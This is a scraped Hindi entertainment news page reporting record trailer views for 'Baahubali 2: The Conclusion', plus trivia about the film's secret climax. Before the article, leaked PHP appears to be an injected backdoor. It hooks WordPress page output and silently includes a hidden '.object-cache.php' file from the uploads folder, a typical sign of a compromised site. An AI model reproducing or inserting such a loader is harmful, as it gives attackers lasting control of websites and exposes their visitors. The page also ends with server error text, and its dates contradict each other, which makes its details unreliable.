add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); 5 करोड़ से ज्यादा लोगों ने देखा ‘बाहुबली 2 : द कन्क्लूजन’ का ट्रेलर, क्या आपने देखा – SOCH INDIA
Menu

मनोरंजन
5 करोड़ से ज्यादा लोगों ने देखा ‘बाहुबली 2 : द कन्क्लूजन’ का ट्रेलर, क्या आपने देखा

nobanner

मोस्ट अवेटेड फिल्म ‘बाहुबली 2 : द कन्क्लूजन’ के ट्रेलर को इसके रिलीज होने के 24 घंटे के भीतर पांच करोड़ से अधिक लोग देख चुके हैं. यह किसी भी भारतीय फिल्म का सबसे ज्यादा देखा जाने वाला ट्रेलर बन गया है. फिल्म का ट्रेलर गुरुवार को चार भाषाओं- हिन्दी, तमिल, तेलुगू व मलयालम में जारी किया गया.

फिल्म के डायरेक्टर एस.एस. राजामौली ने सोशल मीडिया के जरिए इसकी जानकारी दी है.

फिल्म का हिंदी वर्जन जारी करने वाले फिल्मकार करण जौहर ने शुक्रवार को ट्विटर पर लिखा, “अब तक का सबसे बड़ा ट्रेलर. पांच करोड़ लोगों ने देखा. ‘बाहुबली 2 : द कन्क्लूजन’.

फिल्म का ट्रेलर गुरुवार को अपनी रिलीज से कुछ घंटों पहले ही लीक हो गया था. इसके बावजूद इसे चारों भाषाओं में आधिकारिक तौर पर जारी किया गया. इसके कुछ देर बाद ही यह ऑनलाइन वायरल हो गया.

आपको बता दें कि हाल ही में फिल्म का नया पोस्टर रिलीज हुआ था. डायरेक्टर एस.एस. राजामौली ने सोशल मीडिया पर इसे शेयर किया था जो खूब वायरल हुआ.

पोस्टर शेयर करते हुए डायरेक्टर ने फेसबुक पर लिखा था, ‘जिस बच्चे को उसने पाला-पोषा, उसने ही उसे मारा.’ जिसने भी इस फिल्म को देखा है, वो सहज ही अंदाजा लगा सकता है इस लाइन का मतलब क्या है? बता दें कि फिल्म में कटप्पा ही अमरेंद्र बाहुबली को पालता-पोषता है और फिर फिल्म के अंत में वो ही उसे मार देता है. सोशल मीडिया पर यह सवाल अभी भी पूछा जाता है कि कटप्पा ने बाहुबली को क्यों मारा?

आपको यह भी बता दें कि बाहुबली देखने के बाद जिस सवाल का जवाब दर्शक पिछले साल से ही ढ़ूढ रहे हैं कि आखिर कटप्पा ने बाहुबली को क्यों मारा, इसका जवाब सिर्फ तीन लोगों को पता है और वो हैं अभिनेता प्रभाष, निर्देशक एस एस राजामौली और कहानीकार.

फिल्म की रिलीज से पहले क्लाइमैक्स लीक ना हो पाए इसलिए डायरेक्टर राजामौली ने ‘बाहुबली: द कनक्लूजन’ के एक, दो या तीन नहीं बल्कि कुल चार क्लाइमेक्स शूट किए हैं. और अब तक ये तय नहीं हुआ कौन सा क्लाइमेक्स फिल्म में दिखाया जाएगा. इस फिल्म की पूरी शूटिंग खत्म होने के बाद इसके बारे में कोई निर्णय लिया जाएगा.

ये फिल्म 28 अप्रैल 2017 को सिनेमाघरों में रिलीज होगी. वहीं फिल्म का ट्रेलर 16 मार्च को रिलीज होगा. आपको बता दें कि बाहुबली को 6 भाषाओं में रिलीज किया गया था और इसे दर्शकों ने खूब पसंद किया था. इस फिल्म ने बॉक्स ऑफिस पर कमाई के मामले में खलबली मचा दी थी.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.